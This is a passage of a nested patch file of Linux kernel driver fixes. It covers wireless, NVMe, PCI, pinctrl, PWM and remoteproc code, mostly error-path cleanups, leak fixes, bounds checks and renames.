+ 	for (rf_path = 0; rf_path < rtwdev->hal.rf_path_num; rf_path++) {
+diff --git a/drivers/net/wireless/realtek/rtw88/rtw8821c.c b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+index 609a2b86330d8..50e3e46f7d8aa 100644
+--- a/drivers/net/wireless/realtek/rtw88/rtw8821c.c
++++ b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+@@ -674,9 +674,9 @@ static void rtw8821c_false_alarm_statistics(struct rtw_dev *rtwdev)
+ 
+ 	dm_info->cck_fa_cnt = cck_fa_cnt;
+ 	dm_info->ofdm_fa_cnt = ofdm_fa_cnt;
++	dm_info->total_fa_cnt = ofdm_fa_cnt;
+ 	if (cck_enable)
+ 		dm_info->total_fa_cnt += cck_fa_cnt;
+-	dm_info->total_fa_cnt = ofdm_fa_cnt;
+ 
+ 	crc32_cnt = rtw_read32(rtwdev, REG_CRC_CCK);
+ 	dm_info->cck_ok_cnt = FIELD_GET(GENMASK(15, 0), crc32_cnt);
+diff --git a/drivers/net/wireless/silabs/wfx/sta.c b/drivers/net/wireless/silabs/wfx/sta.c
+index 073e870b26415..871667650dbef 100644
+--- a/drivers/net/wireless/silabs/wfx/sta.c
++++ b/drivers/net/wireless/silabs/wfx/sta.c
+@@ -362,6 +362,7 @@ static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ 	const int pairwise_cipher_suite_count_offset = 8 / sizeof(u16);
+ 	const int pairwise_cipher_suite_size = 4 / sizeof(u16);
+ 	const int akm_suite_size = 4 / sizeof(u16);
++	int ret = -EINVAL;
+ 	const u16 *ptr;
+ 
+ 	if (unlikely(!skb))
+@@ -370,22 +371,26 @@ static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ 	ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
+ 				      skb->len - ieoffset);
+ 	if (unlikely(!ptr))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	ptr += pairwise_cipher_suite_count_offset;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	ptr += 1 + pairwise_cipher_suite_size * *ptr;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	ptr += 1 + akm_suite_size * *ptr;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-		return -EINVAL;
++		goto free_skb;
+ 
+ 	wfx_hif_set_mfp(wvif, *ptr & BIT(7), *ptr & BIT(6));
+-	return 0;
++	ret = 0;
++
++free_skb:
++	dev_kfree_skb(skb);
++	return ret;
+ }
+ 
+ int wfx_start_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+diff --git a/drivers/ntb/core.c b/drivers/ntb/core.c
+index 27dd93deff6e5..d702bee780826 100644
+--- a/drivers/ntb/core.c
++++ b/drivers/ntb/core.c
+@@ -100,6 +100,8 @@ EXPORT_SYMBOL(ntb_unregister_client);
+ 
+ int ntb_register_device(struct ntb_dev *ntb)
+ {
++	int ret;
++
+ 	if (!ntb)
+ 		return -EINVAL;
+ 	if (!ntb->pdev)
+@@ -120,7 +122,11 @@ int ntb_register_device(struct ntb_dev *ntb)
+ 	ntb->ctx_ops = NULL;
+ 	spin_lock_init(&ntb->ctx_lock);
+ 
+-	return device_register(&ntb->dev);
++	ret = device_register(&ntb->dev);
++	if (ret)
++		put_device(&ntb->dev);
++
++	return ret;
+ }
+ EXPORT_SYMBOL(ntb_register_device);
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 0c088db944706..d7516e99275b6 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4971,7 +4971,8 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	set->ops = ops;
+ 	set->queue_depth = NVME_AQ_MQ_TAG_DEPTH;
+ 	if (ctrl->ops->flags & NVME_F_FABRICS)
+-		set->reserved_tags = NVMF_RESERVED_TAGS;
++		/* Reserved for fabric connect and keep alive */
++		set->reserved_tags = 2;
+ 	set->numa_node = ctrl->numa_node;
+ 	set->flags = BLK_MQ_F_NO_SCHED;
+ 	if (ctrl->ops->flags & NVME_F_BLOCKING)
+@@ -5029,7 +5030,15 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	memset(set, 0, sizeof(*set));
+ 	set->ops = ops;
+ 	set->queue_depth = ctrl->sqsize + 1;
+-	set->reserved_tags = NVMF_RESERVED_TAGS;
++	/*
++	 * Some Apple controllers requires tags to be unique across admin and
++	 * the (only) I/O queue, so reserve the first 32 tags of the I/O queue.
++	 */
++	if (ctrl->quirks & NVME_QUIRK_SHARED_TAGS)
++		set->reserved_tags = NVME_AQ_DEPTH;
++	else if (ctrl->ops->flags & NVME_F_FABRICS)
++		/* Reserved for fabric connect */
++		set->reserved_tags = 1;
+ 	set->numa_node = ctrl->numa_node;
+ 	set->flags = BLK_MQ_F_SHOULD_MERGE;
+ 	if (ctrl->ops->flags & NVME_F_BLOCKING)
+diff --git a/drivers/nvme/host/fabrics.h b/drivers/nvme/host/fabrics.h
+index dcac3df8a5f76..60c238caf7a97 100644
+--- a/drivers/nvme/host/fabrics.h
++++ b/drivers/nvme/host/fabrics.h
+@@ -18,13 +18,6 @@
+ /* default is -1: the fail fast mechanism is disabled  */
+ #define NVMF_DEF_FAIL_FAST_TMO		-1
+ 
+-/*
+- * Reserved one command for internal usage.  This command is used for sending
+- * the connect command, as well as for the keep alive command on the admin
+- * queue once live.
+- */
+-#define NVMF_RESERVED_TAGS	1
+-
+ /*
+  * Define a host as seen by the target.  We allocate one at boot, but also
+  * allow the override it when creating controllers.  This is both to provide
+diff --git a/drivers/opp/debugfs.c b/drivers/opp/debugfs.c
+index 2c7fb683441ef..de81bbf4be100 100644
+--- a/drivers/opp/debugfs.c
++++ b/drivers/opp/debugfs.c
+@@ -37,10 +37,12 @@ static ssize_t bw_name_read(struct file *fp, char __user *userbuf,
+ 			    size_t count, loff_t *ppos)
+ {
+ 	struct icc_path *path = fp->private_data;
++	const char *name = icc_get_name(path);
+ 	char buf[64];
+-	int i;
++	int i = 0;
+ 
+-	i = scnprintf(buf, sizeof(buf), "%.62s\n", icc_get_name(path));
++	if (name)
++		i = scnprintf(buf, sizeof(buf), "%.62s\n", name);
+ 
+ 	return simple_read_from_buffer(userbuf, count, ppos, buf, i);
+ }
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index 8c6931210ac4d..b4c1a4f6029d4 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -1281,14 +1281,11 @@ static int pci_vntb_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ret = ntb_register_device(&ndev->ntb);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register NTB device\n");
+-		goto err_register_dev;
++		return ret;
+ 	}
+ 
+ 	dev_dbg(dev, "PCI Virtual NTB driver loaded\n");
+ 	return 0;
+-
+-err_register_dev:
+-	return -EINVAL;
+ }
+ 
+ static struct pci_device_id pci_vntb_table[] = {
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index e1d02b7c60294..9950deeb047a7 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -357,11 +357,6 @@ static inline int pci_dev_set_disconnected(struct pci_dev *dev, void *unused)
+ 	return 0;
+ }
+ 
+-static inline bool pci_dev_is_disconnected(const struct pci_dev *dev)
+-{
+-	return dev->error_state == pci_channel_io_perm_failure;
+-}
+-
+ /* pci_dev priv_flags */
+ #define PCI_DEV_ADDED 0
+ #define PCI_DPC_RECOVERED 1
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index a5d7c69b764e0..08800282825e1 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -231,7 +231,7 @@ static void dpc_process_rp_pio_error(struct pci_dev *pdev)
+ 
+ 	for (i = 0; i < pdev->dpc_rp_log_size - 5; i++) {
+ 		pci_read_config_dword(pdev,
+-			cap + PCI_EXP_DPC_RP_PIO_TLPPREFIX_LOG, &prefix);
++			cap + PCI_EXP_DPC_RP_PIO_TLPPREFIX_LOG + i * 4, &prefix);
+ 		pci_err(pdev, "TLP Prefix Header: dw%d, %#010x\n", i, prefix);
+ 	}
+  clear_status:
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 51d634fbdfb8e..c175b70a984c6 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5415,6 +5415,7 @@ static void quirk_no_ext_tags(struct pci_dev *pdev)
+ 
+ 	pci_walk_bus(bridge->bus, pci_configure_extended_tags, NULL);
+ }
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_3WARE, 0x1004, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0132, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0140, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0141, quirk_no_ext_tags);
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 3f3320d0a4f8f..d05a482639e3c 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -1674,7 +1674,7 @@ static int switchtec_pci_probe(struct pci_dev *pdev,
+ 	rc = switchtec_init_isr(stdev);
+ 	if (rc) {
+ 		dev_err(&stdev->dev, "failed to init isr.\n");
+-		goto err_put;
++		goto err_exit_pci;
+ 	}
+ 
+ 	iowrite32(SWITCHTEC_EVENT_CLEAR |
+@@ -1695,6 +1695,8 @@ static int switchtec_pci_probe(struct pci_dev *pdev,
+ 
+ err_devadd:
+ 	stdev_kill(stdev);
++err_exit_pci:
++	switchtec_exit_pci(stdev);
+ err_put:
+ 	ida_free(&switchtec_minor_ida, MINOR(stdev->dev.devt));
+ 	put_device(&stdev->dev);
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 47e7c3206939f..899e4ed49905c 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -2178,6 +2178,17 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 				dev_dbg(cmn->dev, "ignoring external node %llx\n", reg);
+ 				continue;
+ 			}
++			/*
++			 * AmpereOneX erratum AC04_MESH_1 makes some XPs report a bogus
++			 * child count larger than the number of valid child pointers.
++			 * A child offset of 0 can only occur on CMN-600; otherwise it
++			 * would imply the root node being its own grandchild, which
++			 * we can safely dismiss in general.
++			 */
++			if (reg == 0 && cmn->part != PART_CMN600) {
++				dev_dbg(cmn->dev, "bogus child pointer?\n");
++				continue;
++			}
+ 
+ 			arm_cmn_init_node_info(cmn, reg & CMN_CHILD_NODE_ADDR, dn);
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt8186.c b/drivers/pinctrl/mediatek/pinctrl-mt8186.c
+index a02f7c3269707..09edcf47effec 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt8186.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt8186.c
+@@ -1198,7 +1198,6 @@ static const struct mtk_pin_reg_calc mt8186_reg_cals[PINCTRL_PIN_REG_MAX] = {
+ 	[PINCTRL_PIN_REG_DIR] = MTK_RANGE(mt8186_pin_dir_range),
+ 	[PINCTRL_PIN_REG_DI] = MTK_RANGE(mt8186_pin_di_range),
+ 	[PINCTRL_PIN_REG_DO] = MTK_RANGE(mt8186_pin_do_range),
+-	[PINCTRL_PIN_REG_SR] = MTK_RANGE(mt8186_pin_dir_range),
+ 	[PINCTRL_PIN_REG_SMT] = MTK_RANGE(mt8186_pin_smt_range),
+ 	[PINCTRL_PIN_REG_IES] = MTK_RANGE(mt8186_pin_ies_range),
+ 	[PINCTRL_PIN_REG_PU] = MTK_RANGE(mt8186_pin_pu_range),
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt8192.c b/drivers/pinctrl/mediatek/pinctrl-mt8192.c
+index 9695f4ec6aba9..f120268c00f56 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt8192.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt8192.c
+@@ -1379,7 +1379,6 @@ static const struct mtk_pin_reg_calc mt8192_reg_cals[PINCTRL_PIN_REG_MAX] = {
+ 	[PINCTRL_PIN_REG_DIR] = MTK_RANGE(mt8192_pin_dir_range),
+ 	[PINCTRL_PIN_REG_DI] = MTK_RANGE(mt8192_pin_di_range),
+ 	[PINCTRL_PIN_REG_DO] = MTK_RANGE(mt8192_pin_do_range),
+-	[PINCTRL_PIN_REG_SR] = MTK_RANGE(mt8192_pin_dir_range),
+ 	[PINCTRL_PIN_REG_SMT] = MTK_RANGE(mt8192_pin_smt_range),
+ 	[PINCTRL_PIN_REG_IES] = MTK_RANGE(mt8192_pin_ies_range),
+ 	[PINCTRL_PIN_REG_PU] = MTK_RANGE(mt8192_pin_pu_range),
+diff --git a/drivers/pinctrl/nomadik/pinctrl-nomadik.c b/drivers/pinctrl/nomadik/pinctrl-nomadik.c
+index f7d02513d8cc1..e79037dc85796 100644
+--- a/drivers/pinctrl/nomadik/pinctrl-nomadik.c
++++ b/drivers/pinctrl/nomadik/pinctrl-nomadik.c
+@@ -1571,8 +1571,10 @@ static int nmk_pmx_set(struct pinctrl_dev *pctldev, unsigned function,
+ 		 * Then mask the pins that need to be sleeping now when we're
+ 		 * switching to the ALT C function.
+ 		 */
+-		for (i = 0; i < g->grp.npins; i++)
+-			slpm[g->grp.pins[i] / NMK_GPIO_PER_CHIP] &= ~BIT(g->grp.pins[i]);
++		for (i = 0; i < g->grp.npins; i++) {
++			unsigned int bit = g->grp.pins[i] % NMK_GPIO_PER_CHIP;
++			slpm[g->grp.pins[i] / NMK_GPIO_PER_CHIP] &= ~BIT(bit);
++		}
+ 		nmk_gpio_glitch_slpm_init(slpm);
+ 	}
+ 
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index 43a63a21a6fb5..acf7664ea835b 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -2360,6 +2360,30 @@ static const unsigned int scif_clk_mux[] = {
+ 	SCIF_CLK_MARK,
+ };
+ 
++static const unsigned int scif_clk2_pins[] = {
++	/* SCIF_CLK2 */
++	RCAR_GP_PIN(8, 11),
++};
++static const unsigned int scif_clk2_mux[] = {
++	SCIF_CLK2_MARK,
++};
++
++/* - SSI ------------------------------------------------- */
++static const unsigned int ssi_data_pins[] = {
++	/* SSI_SD */
++	RCAR_GP_PIN(1, 20),
++};
++static const unsigned int ssi_data_mux[] = {
++	SSI_SD_MARK,
++};
++static const unsigned int ssi_ctrl_pins[] = {
++	/* SSI_SCK,  SSI_WS */
++	RCAR_GP_PIN(1, 18), RCAR_GP_PIN(1, 19),
++};
++static const unsigned int ssi_ctrl_mux[] = {
++	SSI_SCK_MARK, SSI_WS_MARK,
++};
++
+ /* - TPU ------------------------------------------------------------------- */
+ static const unsigned int tpu_to0_pins[] = {
+ 	/* TPU0TO0 */
+@@ -2651,6 +2675,10 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(scif4_clk),
+ 	SH_PFC_PIN_GROUP(scif4_ctrl),
+ 	SH_PFC_PIN_GROUP(scif_clk),
++	SH_PFC_PIN_GROUP(scif_clk2),
++
++	SH_PFC_PIN_GROUP(ssi_data),
++	SH_PFC_PIN_GROUP(ssi_ctrl),
+ 
+ 	SH_PFC_PIN_GROUP(tpu_to0),		/* suffix might be updated */
+ 	SH_PFC_PIN_GROUP(tpu_to0_a),		/* suffix might be updated */
+@@ -2964,6 +2992,15 @@ static const char * const scif_clk_groups[] = {
+ 	"scif_clk",
+ };
+ 
++static const char * const scif_clk2_groups[] = {
++	"scif_clk2",
++};
++
++static const char * const ssi_groups[] = {
++	"ssi_data",
++	"ssi_ctrl",
++};
++
+ static const char * const tpu_groups[] = {
+ 	/* suffix might be updated */
+ 	"tpu_to0",
+@@ -3044,6 +3081,9 @@ static const struct sh_pfc_function pinmux_functions[] = {
+ 	SH_PFC_FUNCTION(scif3),
+ 	SH_PFC_FUNCTION(scif4),
+ 	SH_PFC_FUNCTION(scif_clk),
++	SH_PFC_FUNCTION(scif_clk2),
++
++	SH_PFC_FUNCTION(ssi),
+ 
+ 	SH_PFC_FUNCTION(tpu),
+ 
+diff --git a/drivers/powercap/dtpm_cpu.c b/drivers/powercap/dtpm_cpu.c
+index 9193c3b8edebe..ae7ee611978ba 100644
+--- a/drivers/powercap/dtpm_cpu.c
++++ b/drivers/powercap/dtpm_cpu.c
+@@ -219,7 +219,7 @@ static int __dtpm_cpu_setup(int cpu, struct dtpm *parent)
+ 	ret = freq_qos_add_request(&policy->constraints,
+ 				   &dtpm_cpu->qos_req, FREQ_QOS_MAX,
+ 				   pd->table[pd->nr_perf_states - 1].frequency);
+-	if (ret)
++	if (ret < 0)
+ 		goto out_dtpm_unregister;
+ 
+ 	cpufreq_cpu_put(policy);
+diff --git a/drivers/pwm/pwm-atmel-hlcdc.c b/drivers/pwm/pwm-atmel-hlcdc.c
+index a43b2babc8093..3e9c94a8d7f72 100644
+--- a/drivers/pwm/pwm-atmel-hlcdc.c
++++ b/drivers/pwm/pwm-atmel-hlcdc.c
+@@ -38,11 +38,11 @@ static inline struct atmel_hlcdc_pwm *to_atmel_hlcdc_pwm(struct pwm_chip *chip)
+ 	return container_of(chip, struct atmel_hlcdc_pwm, chip);
+ }
+ 
+-static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
++static int atmel_hlcdc_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 				 const struct pwm_state *state)
+ {
+-	struct atmel_hlcdc_pwm *chip = to_atmel_hlcdc_pwm(c);
+-	struct atmel_hlcdc *hlcdc = chip->hlcdc;
++	struct atmel_hlcdc_pwm *atmel = to_atmel_hlcdc_pwm(chip);
++	struct atmel_hlcdc *hlcdc = atmel->hlcdc;
+ 	unsigned int status;
+ 	int ret;
+ 
+@@ -54,7 +54,7 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 		u32 pwmcfg;
+ 		int pres;
+ 
+-		if (!chip->errata || !chip->errata->slow_clk_erratum) {
++		if (!atmel->errata || !atmel->errata->slow_clk_erratum) {
+ 			clk_freq = clk_get_rate(new_clk);
+ 			if (!clk_freq)
+ 				return -EINVAL;
+@@ -64,7 +64,7 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 		}
+ 
+ 		/* Errata: cannot use slow clk on some IP revisions */
+-		if ((chip->errata && chip->errata->slow_clk_erratum) ||
++		if ((atmel->errata && atmel->errata->slow_clk_erratum) ||
+ 		    clk_period_ns > state->period) {
+ 			new_clk = hlcdc->sys_clk;
+ 			clk_freq = clk_get_rate(new_clk);
+@@ -77,8 +77,8 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 
+ 		for (pres = 0; pres <= ATMEL_HLCDC_PWMPS_MAX; pres++) {
+ 		/* Errata: cannot divide by 1 on some IP revisions */
+-			if (!pres && chip->errata &&
+-			    chip->errata->div1_clk_erratum)
++			if (!pres && atmel->errata &&
++			    atmel->errata->div1_clk_erratum)
+ 				continue;
+ 
+ 			if ((clk_period_ns << pres) >= state->period)
+@@ -90,7 +90,7 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 
+ 		pwmcfg = ATMEL_HLCDC_PWMPS(pres);
+ 
+-		if (new_clk != chip->cur_clk) {
++		if (new_clk != atmel->cur_clk) {
+ 			u32 gencfg = 0;
+ 			int ret;
+ 
+@@ -98,8 +98,8 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 			if (ret)
+ 				return ret;
+ 
+-			clk_disable_unprepare(chip->cur_clk);
+-			chip->cur_clk = new_clk;
++			clk_disable_unprepare(atmel->cur_clk);
++			atmel->cur_clk = new_clk;
+ 
+ 			if (new_clk == hlcdc->sys_clk)
+ 				gencfg = ATMEL_HLCDC_CLKPWMSEL;
+@@ -160,8 +160,8 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 		if (ret)
+ 			return ret;
+ 
+-		clk_disable_unprepare(chip->cur_clk);
+-		chip->cur_clk = NULL;
++		clk_disable_unprepare(atmel->cur_clk);
++		atmel->cur_clk = NULL;
+ 	}
+ 
+ 	return 0;
+@@ -183,31 +183,32 @@ static const struct atmel_hlcdc_pwm_errata atmel_hlcdc_pwm_sama5d3_errata = {
+ #ifdef CONFIG_PM_SLEEP
+ static int atmel_hlcdc_pwm_suspend(struct device *dev)
+ {
+-	struct atmel_hlcdc_pwm *chip = dev_get_drvdata(dev);
++	struct atmel_hlcdc_pwm *atmel = dev_get_drvdata(dev);
+ 
+ 	/* Keep the periph clock enabled if the PWM is still running. */
+-	if (pwm_is_enabled(&chip->chip.pwms[0]))
+-		clk_disable_unprepare(chip->hlcdc->periph_clk);
++	if (!pwm_is_enabled(&atmel->chip.pwms[0]))
++		clk_disable_unprepare(atmel->hlcdc->periph_clk);
+ 
+ 	return 0;
+ }
+ 
+ static int atmel_hlcdc_pwm_resume(struct device *dev)
+ {
+-	struct atmel_hlcdc_pwm *chip = dev_get_drvdata(dev);
++	struct atmel_hlcdc_pwm *atmel = dev_get_drvdata(dev);
+ 	struct pwm_state state;
+ 	int ret;
+ 
+-	pwm_get_state(&chip->chip.pwms[0], &state);
++	pwm_get_state(&atmel->chip.pwms[0], &state);
+ 
+ 	/* Re-enable the periph clock it was stopped during suspend. */
+ 	if (!state.enabled) {
+-		ret = clk_prepare_enable(chip->hlcdc->periph_clk);
++		ret = clk_prepare_enable(atmel->hlcdc->periph_clk);
+ 		if (ret)
+ 			return ret;
+ 	}
+ 
+-	return atmel_hlcdc_pwm_apply(&chip->chip, &chip->chip.pwms[0], &state);
++	return atmel_hlcdc_pwm_apply(&atmel->chip, &atmel->chip.pwms[0],
++				     &state);
+ }
+ #endif
+ 
+@@ -244,14 +245,14 @@ static int atmel_hlcdc_pwm_probe(struct platform_device *pdev)
+ {
+ 	const struct of_device_id *match;
+ 	struct device *dev = &pdev->dev;
+-	struct atmel_hlcdc_pwm *chip;
++	struct atmel_hlcdc_pwm *atmel;
+ 	struct atmel_hlcdc *hlcdc;
+ 	int ret;
+ 
+ 	hlcdc = dev_get_drvdata(dev->parent);
+ 
+-	chip = devm_kzalloc(dev, sizeof(*chip), GFP_KERNEL);
+-	if (!chip)
++	atmel = devm_kzalloc(dev, sizeof(*atmel), GFP_KERNEL);
++	if (!atmel)
+ 		return -ENOMEM;
+ 
+ 	ret = clk_prepare_enable(hlcdc->periph_clk);
+@@ -260,33 +261,31 @@ static int atmel_hlcdc_pwm_probe(struct platform_device *pdev)
+ 
+ 	match = of_match_node(atmel_hlcdc_dt_ids, dev->parent->of_node);
+ 	if (match)
+-		chip->errata = match->data;
++		atmel->errata = match->data;
+ 
+-	chip->hlcdc = hlcdc;
+-	chip->chip.ops = &atmel_hlcdc_pwm_ops;
+-	chip->chip.dev = dev;
+-	chip->chip.npwm = 1;
++	atmel->hlcdc = hlcdc;
++	atmel->chip.ops = &atmel_hlcdc_pwm_ops;
++	atmel->chip.dev = dev;
++	atmel->chip.npwm = 1;
+ 
+-	ret = pwmchip_add(&chip->chip);
++	ret = pwmchip_add(&atmel->chip);
+ 	if (ret) {
+ 		clk_disable_unprepare(hlcdc->periph_clk);
+ 		return ret;
+ 	}
+ 
+-	platform_set_drvdata(pdev, chip);
++	platform_set_drvdata(pdev, atmel);
+ 
+ 	return 0;
+ }
+ 
+-static int atmel_hlcdc_pwm_remove(struct platform_device *pdev)
++static void atmel_hlcdc_pwm_remove(struct platform_device *pdev)
+ {
+-	struct atmel_hlcdc_pwm *chip = platform_get_drvdata(pdev);
++	struct atmel_hlcdc_pwm *atmel = platform_get_drvdata(pdev);
+ 
+-	pwmchip_remove(&chip->chip);
++	pwmchip_remove(&atmel->chip);
+ 
+-	clk_disable_unprepare(chip->hlcdc->periph_clk);
+-
+-	return 0;
++	clk_disable_unprepare(atmel->hlcdc->periph_clk);
+ }
+ 
+ static const struct of_device_id atmel_hlcdc_pwm_dt_ids[] = {
+@@ -301,7 +300,7 @@ static struct platform_driver atmel_hlcdc_pwm_driver = {
+ 		.pm = &atmel_hlcdc_pwm_pm_ops,
+ 	},
+ 	.probe = atmel_hlcdc_pwm_probe,
+-	.remove = atmel_hlcdc_pwm_remove,
++	.remove_new = atmel_hlcdc_pwm_remove,
+ };
+ module_platform_driver(atmel_hlcdc_pwm_driver);
+ 
+diff --git a/drivers/pwm/pwm-sti.c b/drivers/pwm/pwm-sti.c
+index 652fdb8dc7bfa..0a7920cbd4949 100644
+--- a/drivers/pwm/pwm-sti.c
++++ b/drivers/pwm/pwm-sti.c
+@@ -395,8 +395,17 @@ static int sti_pwm_capture(struct pwm_chip *chip, struct pwm_device *pwm,
+ static int sti_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 			 const struct pwm_state *state)
+ {
++	struct sti_pwm_chip *pc = to_sti_pwmchip(chip);
++	struct sti_pwm_compat_data *cdata = pc->cdata;
++	struct device *dev = pc->dev;
+ 	int err;
+ 
++	if (pwm->hwpwm >= cdata->pwm_num_devs) {
++		dev_err(dev, "device %u is not valid for pwm mode\n",
++			pwm->hwpwm);
++		return -EINVAL;
++	}
++
+ 	if (state->polarity != PWM_POLARITY_NORMAL)
+ 		return -EINVAL;
+ 
+@@ -647,7 +656,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 
+ 	pc->chip.dev = dev;
+ 	pc->chip.ops = &sti_pwm_ops;
+-	pc->chip.npwm = pc->cdata->pwm_num_devs;
++	pc->chip.npwm = max(cdata->pwm_num_devs, cdata->cpt_num_devs);
+ 
+ 	for (i = 0; i < cdata->cpt_num_devs; i++) {
+ 		struct sti_cpt_ddata *ddata = &cdata->ddata[i];
+diff --git a/drivers/remoteproc/Kconfig b/drivers/remoteproc/Kconfig
+index 1660197866531..d93113b6ffaa1 100644
+--- a/drivers/remoteproc/Kconfig
++++ b/drivers/remoteproc/Kconfig
+@@ -313,7 +313,7 @@ config ST_SLIM_REMOTEPROC
+ 
+ config STM32_RPROC
+ 	tristate "STM32 remoteproc support"
+-	depends on ARCH_STM32
++	depends on ARCH_STM32 || COMPILE_TEST
+ 	depends on REMOTEPROC
+ 	select MAILBOX
+ 	help
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 8746cbb1f168d..74da0393172c5 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -118,10 +118,10 @@ static int stm32_rproc_mem_alloc(struct rproc *rproc,
+ 	struct device *dev = rproc->dev.parent;
+ 	void *va;
+ 
+-	dev_dbg(dev, "map memory: %pa+%x\n", &mem->dma, mem->len);
+-	va = ioremap_wc(mem->dma, mem->len);
++	dev_dbg(dev, "map memory: %pad+%zx\n", &mem->dma, mem->len);
++	va = (__force void *)ioremap_wc(mem->dma, mem->len);
+ 	if (IS_ERR_OR_NULL(va)) {
+-		dev_err(dev, "Unable to map memory region: %pa+%x\n",
++		dev_err(dev, "Unable to map memory region: %pad+0x%zx\n",
+ 			&mem->dma, mem->len);
+ 		return -ENOMEM;
+ 	}
+@@ -136,7 +136,7 @@ static int stm32_rproc_mem_release(struct rproc *rproc,
+ 				   struct rproc_mem_entry *mem)
+ {
+ 	dev_dbg(rproc->dev.parent, "unmap memory: %pa\n", &mem->dma);
+-	iounmap(mem->va);
++	iounmap((__force __iomem void *)mem->va);
+ 
+ 	return 0;
+ }
+@@ -627,7 +627,7 @@ stm32_rproc_get_loaded_rsc_table(struct rproc *rproc, size_t *table_sz)
+ 
+ 	ddata->rsc_va = devm_ioremap_wc(dev, rsc_pa, RSC_TBL_SIZE);
+ 	if (IS_ERR_OR_NULL(ddata->rsc_va)) {
+-		dev_err(dev, "Unable to map memory region: %pa+%zx\n",
++		dev_err(dev, "Unable to map memory region: %pa+%x\n",
+ 			&rsc_pa, RSC_TBL_SIZE);
+ 		ddata->rsc_va = NULL;
+ 		return ERR_PTR(-ENOMEM);
+@@ -641,7 +641,7 @@ stm32_rproc_get_loaded_rsc_table(struct rproc *rproc, size_t *table_sz)
+ 	 * entire area by overwriting it with the initial values stored in rproc->clean_table.
+ 	 */
+ 	*table_sz = RSC_TBL_SIZE;
+-	return (struct resource_table *)ddata->rsc_va;
++	return (__force struct resource_table *)ddata->rsc_va;
+ }
+ 
+ static const struct rproc_ops st_rproc_ops = {
+@@ -889,7 +889,7 @@ static int stm32_rproc_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int __maybe_unused stm32_rproc_suspend(struct device *dev)
++static int stm32_rproc_suspend(struct device *dev)
+ {
+ 	struct rproc *rproc = dev_get_drvdata(dev);
+ 	struct stm32_rproc *ddata = rproc->priv;
